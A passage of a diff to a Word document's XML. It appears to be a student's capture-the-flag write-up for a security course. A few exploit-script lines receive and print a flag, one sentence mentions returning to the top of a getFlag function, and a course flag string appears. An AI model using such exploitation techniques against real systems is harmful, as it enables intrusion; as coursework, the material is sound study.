+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>io</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>shutdown</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="240" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>recieved</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>io</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>recvall</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>().</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>decode</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>flag</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>recieved</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>splitlines</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>()[</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="B5CEA8"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>print</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>f</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">'Flag 02: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>{</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>flag</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="240" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5685BD68" wp14:editId="36AEA77B">
+            <wp:extent cx="5972810" cy="1275715"/>
+            <wp:effectExtent l="0" t="0" r="8890" b="635"/>
+            <wp:docPr id="528532923" name="Picture 1" descr="A screen shot of a computer code&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="528532923" name="Picture 1" descr="A screen shot of a computer code&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId12"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5972810" cy="1275715"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">If I return to the top of </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>getFlag</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>, I get an impression of completing the capture without actually capturing the flag:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+          <w:noProof/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EC4E196" wp14:editId="76D68414">
+            <wp:extent cx="5972810" cy="1522730"/>
+            <wp:effectExtent l="0" t="0" r="8890" b="1270"/>
+            <wp:docPr id="1429024128" name="Picture 2" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1429024128" name="Picture 2" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId10">
+                    <a:blip r:embed="rId13">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -1084,7 +5299,7 @@
                   <pic:spPr bwMode="auto">
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4107180" cy="1057275"/>
+                      <a:ext cx="5972810" cy="1522730"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -1103,539 +5318,153 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:val="nb-NO"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:val="nb-NO"/>
-          <w14:ligatures w14:val="none"/>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
         </w:rPr>
         <w:t> </w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>As the output shows, the flag for task 0</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>0</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> is</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:u w:val="single"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>INF226{</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:u w:val="single"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>s33kret c0de</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:u w:val="single"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>}</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
